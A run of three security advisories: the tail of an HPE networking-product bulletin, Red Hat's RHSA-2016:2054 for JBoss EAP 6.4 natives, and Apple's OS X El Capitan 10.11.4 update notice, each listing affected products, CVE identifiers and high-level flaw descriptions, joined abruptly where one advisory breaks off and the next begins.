- JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch
- JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch
HSR6600 (Comware 7) - Version: R7103P09
- HP Network Products
- JG353A HP HSR6602-G Router
- JG354A HP HSR6602-XG Router
- JG776A HP HSR6602-G TAA-compliant Router
- JG777A HP HSR6602-XG TAA-compliant Router
HSR6800 (Comware 7) - Version: R7103P09
- HP Network Products
- JG361A HP HSR6802 Router Chassis
- JG361B HP HSR6802 Router Chassis
- JG362A HP HSR6804 Router Chassis
- JG362B HP HSR6804 Router Chassis
- JG363A HP HSR6808 Router Chassis
- JG363B HP HSR6808 Router Chassis
- JG364A HP HSR6800 RSE-X2 Router Main Processing Unit
- JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing
- JH075A HP HSR6800 RSE-X3 Router Main Processing Unit
1950 (Comware 7) - Version: R3113P02
- HP Network Products
- JG960A HP 1950-24G-4XG Switch
- JG961A HP 1950-48G-2SFP+-2XGT Switch
- JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch
- JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch
7500 (Comware 7) - Version: R7180
- HP Network Products
- JD238C HP 7510 Switch Chassis
- JD239C HP 7506 Switch Chassis
- JD240C HP 7503 Switch Chassis
- JD242C HP 7502 Switch Chassis
- JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only Main Processing Unit
- JH208A HP 7502 Main Processing Unit
- JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port 40GbE QSFP+ Main Processing Unit
5510HI (Comware 7) - Version: R1120
- HP Network Products
- JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch
- JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch
- JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch
- JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch
- JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch
5130HI (Comware 7) - Version: R1120
- HP Network Products
- JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch
- JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch
- JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch
- JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch

iMC Products

IMC PLAT - Version: 7.2 E0403P04
- HP Network Products
- JD125A HP IMC Std S/W Platform w/100-node
- JD126A HP IMC Ent S/W Platform w/100-node
- JD808A HP IMC Ent Platform w/100-node License
- JD814A HP A-IMC Enterprise Edition Software DVD Media
- JD815A HP IMC Std Platform w/100-node License
- JD816A HP A-IMC Standard Edition Software DVD Media
- JF288AAE HP Network Director to Intelligent Management Center Upgrade E-LTU
- JF289AAE HP Enterprise Management System to Intelligent Management Center Upgrade E-LTU
- JF377A HP IMC Std S/W Platform w/100-node Lic
- JF377AAE HP IMC Std S/W Pltfrm w/100-node E-LTU
- JF378A HP IMC Ent S/W Platform w/200-node Lic
- JF378AAE HP IMC Ent S/W Pltfrm w/200-node E-LTU
- JG546AAE HP IMC Basic SW Platform w/50-node E-LTU
- JG548AAE HP PCM+ to IMC Bsc Upgr w/50-node E-LTU
- JG549AAE HP PCM+ to IMC Std Upgr w/200-node E-LTU
- JG747AAE HP IMC Std SW Plat w/ 50 Nodes E-LTU
- JG748AAE HP IMC Ent SW Plat w/ 50 Nodes E-LTU
- JG768AAE HP PCM+ to IMC Std Upg w/ 200-node E-LTU
IMC iNode - Version: 7.2 E0407
- HP Network Products
- JD144A HP A-IMC User Access Management Software Module with 200-user License
- JD147A HP IMC Endpoint Admission Defense Software Module with 200-user License
- JD435A HP A-IMC Endpoint Admission Defense Client Software
- JF388A HP IMC User Authentication Management Software Module with 200-user License
- JF388AAE HP IMC User Authentication Management Software Module with 200-user E-LTU
- JF391A HP IMC Endpoint Admission Defense Software Module with 200-user License
- JF391AAE HP IMC Endpoint Admission Defense Software Module with 200-user E-LTU
- JG752AAE HP IMC User Access Manager Software Module with 50-user E-LTU
- JG754AAE) HP IMC Endpoint Admission Defense Software Module with 50-user E-LTU
iMC UAM_TAM - Version: 7.1 E0406
- HP Network Products
- JF388A HP IMC UAM S/W MODULE W/200-USER LICENSE
- JF388AAE HP IMC UAM S/W MODULE W/200-USER E-LTU
- JG752AAE HP IMC UAM SW MOD W/ 50-USER E-LTU
- JG483A HP IMC TAM S/W MODULE W/100-NODE LIC
- JG483AAE HP IMC TAM S/W MODULE W/100-NODE E-LTU
- JG764AAE HP IMC TAM SW MOD W/ 50-NODE E-LTU
IMC WSM - Version: 7.2 E0502P04
- HP Network Products
- JD456A HP IMC WSM Software Module with 50-Access Point License
- JF414A HP IMC Wireless Service Manager Software Module with 50-Access Point License
- JF414AAE HP IMC Wireless Service Manager Software Module with 50-Access Point E-LTU
- JG551AAE HP PCM+ Mobility Manager to IMC Wireless Service Manager Module Upgrade with 250 Access Point E-LTU
- JG758AAE HP IMC WSM/RTLS w/ 50-node E-LTU
- JG769AAE HP PCM Mobility Manager to IMC Wireless Service Manager Upg with 250-node E-LTU

VCX Products

VCX - Version: 9.8.19
- HP Network Products
- J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr
- J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr
- JC517A HP VCX V7205 Platform w/DL 360 G6 Server
- JE355A HP VCX V6000 Branch Platform 9.0
- JC516A HP VCX V7005 Platform w/DL 120 G6 Server
- JC518A HP VCX Connect 200 Primry 120 G6 Server
- J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr
- JE341A HP VCX Connect 100 Secondary
- JE252A HP VCX Connect Primary MIM Module
- JE253A HP VCX Connect Secondary MIM Module
- JE254A HP VCX Branch MIM Module
- JE355A HP VCX V6000 Branch Platform 9.0
- JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod
- JD023A HP MSR30-40 Router with VCX MIM Module
- JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM
- JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod
- JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod
- JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod
- JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS
- JE340A HP VCX Connect 100 Pri Server 9.0
- JE342A HP VCX Connect 100 Sec Server 9.0

Note: Please contact HPE Technical Support if any assistance is needed acquiring the software updates.

HISTORY Version:1 (rev.1) - 21 February 2017 Initial release

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel.

Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

References:

CVE-2007-6750 CVE-2011-4969 CVE-2014-3508 CVE-2014-3509 CVE-2014-3511 CVE-2014-3513 CVE-2014-3569 CVE-2014-3568 CVE-2014-3567 CVE-2015-1788 CVE-2015-1789 CVE-2015-1790 CVE-2015-1791 CVE-2015-1792 CVE-2015-0205 CVE-2015-3194 CVE-2015-3195 CVE-2015-3237 CVE-2015-6565 CVE-2015-7501 CVE-2015-7547 CVE-2015-7995 CVE-2015-8035 CVE-2016-0705 CVE-2016-0728 CVE-2016-0799 CVE-2016-2015 CVE-2016-2017 CVE-2016-2018 CVE-2016-2019 CVE-2016-2020 CVE-2016-2021 CVE-2016-2022 CVE-2016-2024 CVE-2016-2030 CVE-2016-2842 PSRT110092 PSRT110093 PSRT110094 PSRT110095 PSRT110096 PSRT110138

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Synopsis: Important: Red Hat JBoss Enterprise Application Platform 6.4.10 natives update on RHEL 7 Advisory ID: RHSA-2016:2054-01 Product: Red Hat JBoss Enterprise Application Platform Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-2054.html Issue date: 2016-10-12 CVE Names: CVE-2015-3183 CVE-2015-3195 CVE-2015-4000 CVE-2016-2105 CVE-2016-2106 CVE-2016-2108 CVE-2016-2109 CVE-2016-3110 CVE-2016-4459 =====================================================================

Summary:

Updated packages that provide Red Hat JBoss Enterprise Application Platform 6.4.10 natives, fix several bugs, and add various enhancements are now available for Red Hat Enterprise Linux 7.

Relevant releases/architectures:

Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 7 Server - noarch, ppc64, x86_64

Description:

Red Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.

This release includes bug fixes and enhancements, as well as a new release of OpenSSL that addresses a number of outstanding security flaws. For further information, see the knowledge base article linked to in the References section. All users of Red Hat JBoss Enterprise Application Platform 6.4 on Red Hat Enterprise Linux 7 are advised to upgrade to these updated packages. The JBoss server process must be restarted for the update to take effect.

Security Fix(es):

A flaw was found in the way OpenSSL encoded certain ASN.1 data structures. An attacker could use this flaw to create a specially crafted certificate which, when verified or re-encoded by OpenSSL, could cause it to crash, or execute arbitrary code using the permissions of the user running an application compiled against the OpenSSL library. (CVE-2016-2108)
Multiple flaws were found in the way httpd parsed HTTP requests and responses using chunked transfer encoding. A remote attacker could use these flaws to create a specially crafted request, which httpd would decode differently from an HTTP proxy software in front of it, possibly leading to HTTP request smuggling attacks. (CVE-2015-3183)
A memory leak vulnerability was found in the way OpenSSL parsed PKCS#7 and CMS data. (CVE-2015-3195)
A flaw was found in the way the TLS protocol composes the Diffie-Hellman exchange (for both export and non-export grade cipher suites). An attacker could use this flaw to downgrade a DHE connection to use export-grade key sizes, which could then be broken by sufficient pre-computation. This can lead to a passive man-in-the-middle attack in which the attacker is able to decrypt all traffic. (CVE-2015-4000)
An integer overflow flaw, leading to a buffer overflow, was found in the way the EVP_EncodeUpdate() function of OpenSSL parsed very large amounts of input data. A remote attacker could use this flaw to crash an application using OpenSSL or, possibly, execute arbitrary code with the permissions of the user running that application. (CVE-2016-2105)
An integer overflow flaw, leading to a buffer overflow, was found in the way the EVP_EncryptUpdate() function of OpenSSL parsed very large amounts of input data. A remote attacker could use this flaw to crash an application using OpenSSL or, possibly, execute arbitrary code with the permissions of the user running that application. (CVE-2016-2106)
It was discovered that it is possible to remotely Segfault Apache http server with a specially crafted string sent to the mod_cluster via service messages (MCMP). (CVE-2016-3110)
A denial of service flaw was found in the way OpenSSL parsed certain ASN.1-encoded data from BIO (OpenSSL's I/O abstraction) inputs. An application using OpenSSL that accepts untrusted ASN.1 BIO input could be forced to allocate an excessive amount of data. (CVE-2016-2109)
It was discovered that specifying configuration with a JVMRoute path longer than 80 characters will cause segmentation fault leading to a server crash. (CVE-2016-4459)

Red Hat would like to thank the OpenSSL project for reporting CVE-2016-2108, CVE-2016-2105, and CVE-2016-2106 and Michal Karm Babacek for reporting CVE-2016-3110. The CVE-2016-4459 issue was discovered by Robert Bost (Red Hat). Upstream acknowledges Huzaifa Sidhpurwala (Red Hat), Hanno BAPck, and David Benjamin (Google) as the original reporters of CVE-2016-2108; and Guido Vranken as the original reporter of CVE-2016-2105 and CVE-2016-2106.

Solution:

Before applying this update, back up your existing Red Hat JBoss Enterprise Application Platform installation and deployed applications.

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.

Bugs fixed (https://bugzilla.redhat.com/):

1223211 - CVE-2015-4000 LOGJAM: TLS connections which support export grade DHE key-exchange are vulnerable to MITM attacks 1243887 - CVE-2015-3183 httpd: HTTP request smuggling attack against chunked request parser 1288322 - CVE-2015-3195 OpenSSL: X509_ATTRIBUTE memory leak 1326320 - CVE-2016-3110 mod_cluster: remotely Segfault Apache http server 1330101 - CVE-2016-2109 openssl: ASN.1 BIO handling of large amounts of data 1331402 - CVE-2016-2108 openssl: Memory corruption in the ASN.1 encoder 1331441 - CVE-2016-2105 openssl: EVP_EncodeUpdate overflow 1331536 - CVE-2016-2106 openssl: EVP_EncryptUpdate overflow 1341583 - CVE-2016-4459 mod_cluster: Buffer overflow in mod_manager when sending request with long JVMRoute 1345989 - RHEL7 RPMs: Upgrade mod_cluster-native to 1.2.13.Final-redhat-1 1345993 - RHEL7 RPMs: Upgrade mod_jk to 1.2.41.redhat-1 1345997 - RHEL7 RPMs: Upgrade tomcat-native to 1.1.34

Package List:

Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 7 Server:

Source: hornetq-native-2.3.25-4.SP11_redhat_1.ep6.el7.src.rpm httpd22-2.2.26-56.ep6.el7.src.rpm jbcs-httpd24-openssl-1.0.2h-4.jbcs.el7.src.rpm mod_jk-1.2.41-2.redhat_4.ep6.el7.src.rpm tomcat-native-1.1.34-5.redhat_1.ep6.el7.src.rpm

noarch: jbcs-httpd24-1-3.jbcs.el7.noarch.rpm jbcs-httpd24-runtime-1-3.jbcs.el7.noarch.rpm

ppc64: hornetq-native-2.3.25-4.SP11_redhat_1.ep6.el7.ppc64.rpm hornetq-native-debuginfo-2.3.25-4.SP11_redhat_1.ep6.el7.ppc64.rpm httpd22-2.2.26-56.ep6.el7.ppc64.rpm httpd22-debuginfo-2.2.26-56.ep6.el7.ppc64.rpm httpd22-devel-2.2.26-56.ep6.el7.ppc64.rpm httpd22-manual-2.2.26-56.ep6.el7.ppc64.rpm httpd22-tools-2.2.26-56.ep6.el7.ppc64.rpm jbcs-httpd24-openssl-1.0.2h-4.jbcs.el7.ppc64.rpm jbcs-httpd24-openssl-debuginfo-1.0.2h-4.jbcs.el7.ppc64.rpm jbcs-httpd24-openssl-devel-1.0.2h-4.jbcs.el7.ppc64.rpm jbcs-httpd24-openssl-libs-1.0.2h-4.jbcs.el7.ppc64.rpm jbcs-httpd24-openssl-perl-1.0.2h-4.jbcs.el7.ppc64.rpm jbcs-httpd24-openssl-static-1.0.2h-4.jbcs.el7.ppc64.rpm jbossas-hornetq-native-2.3.25-4.SP11_redhat_1.ep6.el7.ppc64.rpm jbossas-jbossweb-native-1.1.34-5.redhat_1.ep6.el7.ppc64.rpm mod_jk-ap22-1.2.41-2.redhat_4.ep6.el7.ppc64.rpm mod_jk-debuginfo-1.2.41-2.redhat_4.ep6.el7.ppc64.rpm mod_ldap22-2.2.26-56.ep6.el7.ppc64.rpm mod_ssl22-2.2.26-56.ep6.el7.ppc64.rpm tomcat-native-1.1.34-5.redhat_1.ep6.el7.ppc64.rpm tomcat-native-debuginfo-1.1.34-5.redhat_1.ep6.el7.ppc64.rpm

x86_64: hornetq-native-2.3.25-4.SP11_redhat_1.ep6.el7.x86_64.rpm hornetq-native-debuginfo-2.3.25-4.SP11_redhat_1.ep6.el7.x86_64.rpm httpd22-2.2.26-56.ep6.el7.x86_64.rpm httpd22-debuginfo-2.2.26-56.ep6.el7.x86_64.rpm httpd22-devel-2.2.26-56.ep6.el7.x86_64.rpm httpd22-manual-2.2.26-56.ep6.el7.x86_64.rpm httpd22-tools-2.2.26-56.ep6.el7.x86_64.rpm jbcs-httpd24-openssl-1.0.2h-4.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-debuginfo-1.0.2h-4.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-devel-1.0.2h-4.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-libs-1.0.2h-4.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-perl-1.0.2h-4.jbcs.el7.x86_64.rpm jbcs-httpd24-openssl-static-1.0.2h-4.jbcs.el7.x86_64.rpm jbossas-hornetq-native-2.3.25-4.SP11_redhat_1.ep6.el7.x86_64.rpm jbossas-jbossweb-native-1.1.34-5.redhat_1.ep6.el7.x86_64.rpm mod_jk-ap22-1.2.41-2.redhat_4.ep6.el7.x86_64.rpm mod_jk-debuginfo-1.2.41-2.redhat_4.ep6.el7.x86_64.rpm mod_ldap22-2.2.26-56.ep6.el7.x86_64.rpm mod_ssl22-2.2.26-56.ep6.el7.x86_64.rpm tomcat-native-1.1.34-5.redhat_1.ep6.el7.x86_64.rpm tomcat-native-debuginfo-1.1.34-5.redhat_1.ep6.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

References:

https://access.redhat.com/security/cve/CVE-2015-3183 https://access.redhat.com/security/cve/CVE-2015-3195 https://access.redhat.com/security/cve/CVE-2015-4000 https://access.redhat.com/security/cve/CVE-2016-2105 https://access.redhat.com/security/cve/CVE-2016-2106 https://access.redhat.com/security/cve/CVE-2016-2108 https://access.redhat.com/security/cve/CVE-2016-2109 https://access.redhat.com/security/cve/CVE-2016-3110 https://access.redhat.com/security/cve/CVE-2016-4459 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/articles/2688611 https://access.redhat.com/solutions/222023 https://access.redhat.com/documentation/en-US/JBoss_Enterprise_Application_Platform/6.4/index.html https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=appplatform&downloadType=securityPatches&version=6.4

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iD8DBQFX/nCuXlSAg2UNWIIRAq6gAKCk3O4+LVrC6nN6yUHOOzpm8GB7NQCcDcA0 n7n6E5uqbAY0W1AG5Z+9yy8= =6ET2 -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512

APPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update 2016-002

OS X El Capitan 10.11.4 and Security Update 2016-002 is now available and addresses the following:

apache_mod_php Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .png file may lead to arbitrary code execution Description: Multiple vulnerabilities existed in libpng versions prior to 1.6.20. These were addressed by updating libpng to version 1.6.20. CVE-ID CVE-2015-8126 : Adam Mariš CVE-2015-8472 : Adam Mariš

AppleRAID Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-ID CVE-2016-1733 : Proteas of Qihoo 360 Nirvan Team

AppleRAID Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to determine kernel memory layout Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-ID CVE-2016-1732 : Proteas of Qihoo 360 Nirvan Team

AppleUSBNetworking Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the parsing of data from USB devices. This issue was addressed through improved input validation. CVE-ID CVE-2016-1734 : Andrea Barisani and Andrej Rosano of Inverse Path

Bluetooth Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1735 : Jeonghoon Shin@A.D.D CVE-2016-1736 : beist and ABH of BoB

Carbon Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the handling of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2016-1737 : an anonymous researcher

dyld Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker may tamper with code-signed applications to execute arbitrary code in the application's context Description: A code signing verification issue existed in dyld. This issue was addressed with improved validation. CVE-ID CVE-2016-1738 : beist and ABH of BoB

FontParser Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with Trend Micro's Zero Day Initiative (ZDI)

HTTPProtocol Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A remote attacker may be able to execute arbitrary code Description: Multiple vulnerabilities existed in nghttp2 versions prior to 1.6.0, the most serious of which may have led to remote code execution. These were addressed by updating nghttp2 to version 1.6.0. CVE-ID CVE-2015-8659

Intel Graphics Driver Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1743 : Piotr Bania of Cisco Talos CVE-2016-1744 : Ian Beer of Google Project Zero

IOFireWireFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to cause a denial of service Description: A null pointer dereference was addressed through improved validation. CVE-ID CVE-2016-1745 : sweetchip of Grayhash

IOGraphics Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed through improved input validation. CVE-ID CVE-2016-1746 : Peter Pi of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI) CVE-2016-1747 : Juwei Lin of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)

IOHIDFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to determine kernel memory layout Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1748 : Brandon Azad

IOUSBFamily Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1749 : Ian Beer of Google Project Zero and Juwei Lin of Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)

Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed through improved memory management. CVE-ID CVE-2016-1750 : CESG

Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A race condition existed during the creation of new processes. This was addressed through improved state handling. CVE-ID CVE-2016-1757 : Ian Beer of Google Project Zero and Pedro Vilaca

Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference was addressed through improved input validation. CVE-ID CVE-2016-1756 : Lufeng Li of Qihoo 360 Vulcan Team

Kernel Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2016-1755 : Ian Beer of Google Project Zero CVE-2016-1759 : lokihardt

Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to determine kernel memory layout Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-ID CVE-2016-1758 : Brandon Azad

Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple integer overflows were addressed through improved input validation. CVE-ID CVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)

Kernel Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to cause a denial of service Description: A denial of service issue was addressed through improved validation. CVE-ID CVE-2016-1752 : CESG

libxml2 Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing maliciously crafted XML may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2015-1819 CVE-2015-5312 : David Drysdale of Google CVE-2015-7499 CVE-2015-7500 : Kostya Serebryany of Google CVE-2015-7942 : Kostya Serebryany of Google CVE-2015-8035 : gustavo.grieco CVE-2015-8242 : Hugh Davenport CVE-2016-1761 : wol0xff working with Trend Micro's Zero Day Initiative (ZDI) CVE-2016-1762

Messages Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker who is able to bypass Apple's certificate pinning, intercept TLS connections, inject messages, and record encrypted attachment-type messages may be able to read attachments Description: A cryptographic issue was addressed by rejecting duplicate messages on the client. CVE-ID CVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk, Ian Miers, and Michael Rushanan of Johns Hopkins University

Messages Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Clicking a JavaScript link can reveal sensitive user information Description: An issue existed in the processing of JavaScript links. This issue was addressed through improved content security policy checks. CVE-ID CVE-2016-1764 : Matthew Bryan of the Uber Security Team (formerly of Bishop Fox), Joe DeMesy and Shubham Shah of Bishop Fox

NVIDIA Graphics Drivers Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1741 : Ian Beer of Google Project Zero

OpenSSH Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Connecting to a server may leak sensitive user information, such as a client's private keys Description: Roaming, which was on by default in the OpenSSH client, exposed an information leak and a buffer overflow. These issues were addressed by disabling roaming in the client. CVE-ID CVE-2016-0777 : Qualys CVE-2016-0778 : Qualys

OpenSSH Available for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5 Impact: Multiple vulnerabilities in LibreSSL Description: Multiple vulnerabilities existed in LibreSSL versions prior to 2.1.8. These were addressed by updating LibreSSL to version 2.1.8. CVE-ID CVE-2015-5333 : Qualys CVE-2015-5334 : Qualys

OpenSSL Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A remote attacker may be able to cause a denial of service Description: A memory leak existed in OpenSSL versions prior to 0.9.8zh. This issue was addressed by updating OpenSSL to version 0.9.8zh. CVE-ID CVE-2015-3195

Python Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .png file may lead to arbitrary code execution Description: Multiple vulnerabilities existed in libpng versions prior to 1.6.20. These were addressed by updating libpng to version 1.6.20. CVE-ID CVE-2014-9495 CVE-2015-0973 CVE-2015-8126 : Adam Mariš CVE-2015-8472 : Adam Mariš

QuickTime Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted FlashPix Bitmap Image may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1767 : Francis Provencher from COSIG CVE-2016-1768 : Francis Provencher from COSIG

QuickTime Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted Photoshop document may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1769 : Francis Provencher from COSIG

Reminders Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Clicking a tel link can make a call without prompting the user Description: A user was not prompted before invoking a call. This was addressed through improved entitlement checks. CVE-ID CVE-2016-1770 : Guillaume Ross of Rapid7 and Laurent Chouinard of Laurent.ca

Ruby Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local attacker may be able to cause unexpected application termination or arbitrary code execution Description: An unsafe tainted string usage vulnerability existed in versions prior to 2.0.0-p648. This issue was addressed by updating to version 2.0.0-p648. CVE-ID CVE-2015-7551

Security Available for: OS X El Capitan v10.11 to v10.11.3 Impact: A local user may be able to check for the existence of arbitrary files Description: A permissions issue existed in code signing tools. This was addressed though additional ownership checks. CVE-ID CVE-2016-1773 : Mark Mentovai of Google Inc.

Security Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution Description: A memory corruption issue existed in the ASN.1 decoder. This issue was addressed through improved input validation. CVE-ID CVE-2016-1950 : Francis Gabriel of Quarkslab

Tcl Available for:
OS X Yosemite v10.10.5 and OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted .png file may lead to arbitrary code execution Description: Multiple vulnerabilities existed in libpng versions prior to 1.6.20. These were addressed by removing libpng. CVE-ID CVE-2015-8126 : Adam Mariš

TrueTypeScaler Available for: OS X El Capitan v10.11 to v10.11.3 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2016-1775 : 0x1byte working with Trend Micro's Zero Day Initiative (ZDI)

Wi-Fi Available for: OS X El Capitan v10.11 to v10.11.3 Impact: An attacker with a privileged network position may be able to execute arbitrary code Description: A frame validation and memory corruption issue existed for a given ethertype. This issue was addressed through additional ethertype validation and improved memory handling. CVE-ID CVE-2016-0801 : an anonymous researcher CVE-2016-0802 : an anonymous researcher

OS X El Capitan 10.11.4 includes the security content of Safari 9.1. https://support.apple.com/kb/HT206171

OS X El Capitan v10.11.4 and Security Update 2016-002 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/

Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222

